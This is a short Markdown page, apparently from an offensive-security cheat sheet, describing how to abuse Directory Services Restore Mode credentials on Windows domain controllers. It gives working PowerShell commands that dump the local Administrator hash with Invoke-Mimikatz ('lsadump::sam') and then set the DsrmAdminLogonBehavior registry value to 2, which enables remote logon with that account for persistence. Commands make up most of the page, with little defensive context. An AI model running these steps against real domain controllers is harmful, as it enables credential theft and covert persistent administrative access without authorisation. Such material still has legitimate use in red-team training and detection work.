18 lines
1010 B
Markdown
18 lines
1010 B
Markdown
|
# Password - DSRM Credentials
|
||
|
|
||
|
> Directory Services Restore Mode (DSRM) is a safe mode boot option for Windows Server domain controllers. DSRM allows an administrator to repair or recover to repair or restore an Active Directory database.
|
||
|
|
||
|
This is the local administrator account inside each DC. Having admin privileges in this machine, you can use Mimikatz to dump the local Administrator hash. Then, modifying a registry to activate this password so you can remotely access to this local Administrator user.
|
||
|
|
||
|
```ps1
|
||
|
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
|
||
|
|
||
|
# Check if the key exists and get the value
|
||
|
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior
|
||
|
|
||
|
# Create key with value "2" if it doesn't exist
|
||
|
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD
|
||
|
|
||
|
# Change value to "2"
|
||
|
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2
|
||
|
```
|